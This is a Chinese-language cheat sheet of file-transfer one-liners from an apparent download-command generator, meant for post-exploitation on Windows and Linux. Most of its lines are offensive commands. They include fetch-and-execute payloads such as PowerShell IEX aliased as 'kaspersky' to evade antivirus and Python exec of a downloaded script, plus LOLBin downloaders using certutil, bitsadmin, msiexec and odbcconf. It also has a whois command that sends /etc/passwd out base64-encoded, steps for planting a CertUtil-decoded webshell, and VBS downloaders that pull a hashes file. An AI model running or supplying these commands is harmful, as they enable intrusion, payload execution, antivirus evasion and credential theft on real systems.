文件下载命令快捷生成:
项目开源地址:File-Download-Generator
Python HTTP:
python2 -m SimpleHTTPServer
Python3 HTTP:
python3 -m http.server
Python FTP:
python3 -m pyftpdlib -p
Python3 SMB:
python3 impacket-smbserver.py files . -port
Python2 Download:
python2 -c "import urllib2; exec urllib2.urlopen('http://:/').read();"
php 5.4+ http:
php -S 0.0.0.0:
ruby http:
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => , :DocumentRoot => Dir.pwd).start'
ruby 1.9.2+ http:
ruby -run -e httpd . -p --bind-address 0.0.0.0
busybox httpd:
busybox httpd -f -p
PowerShell - IWR:
powershell.exe -Command "Invoke-WebRequest -Uri http://:/ -OutFile "
PowerShell - IEX:
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://:/', )"
CMD - Certutil:
certutil.exe -urlcache -split -f http://:/
CMD - SMB:
copy \\\files\
Windows IPC$:
copy \\c$\ C:\
Linux - wget:
wget http://:/ -O
Linux - curl:
curl http://:/ -o
Windows Bitsadmin:
bitsadmin /rawreturn /transfer down "http://:/" c:\\
Windows msiexec:
msiexec /q /i http://:/
Windows msiexec:
msiexec /q /%os:~1,1% http://:/
Windows PowerShell:
powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://:/payload.ps1')
Windows odbcconf(执行包含特殊功能的DLL,这种DLL文件不需要使用.dll后缀,而且可以通过UNC/WebDAV下载):
odbcconf /s /a {regsvr \\http://:/\folder\payload_dll.txt}
Linux whois:
whois -h -p `cat /etc/passwd | base64` nc -lvvp | sed "s/ //g" | base64 -d
CertReq.exe 下载:
CertReq -Post -config http://:/ c:\windows\win.ini output.txt
CertReq.exe 上传:
CertReq -Post -config http://:/ c:\windows\win.ini and show response in terminal
Windows echo 写入base64+url编码的webshell,CertUtil进行解码::
#写入: echo%20base64+URL编码的webshell%20>webshell.jsp #CertUtil解码: CertUtil -decode Base64编码文件名(可包含路径) 解码后生成的文件名(可包含路径) #注意:CertUtil解码不能与存在的文件名重复
Windows vbs下载器:
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",LCase(WScript.Arguments(0)),0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile LCase(WScript.Arguments(1)),2
使用方法:上面的内容保存为wget.vbs
csript wget.vbs http://192.168.3.100:8080/test.txt test.txt
Windows vbs下载器:
Set xPost = CreateObject("Microsoft.XMLHTTP")
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET"," http://192.168.3.39:4433/hashes.txt",0
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "C:\hash.txt",2
使用方法:down.vbs | cscript down.vbs
参考File Download Generator:https://file-downloads.com/
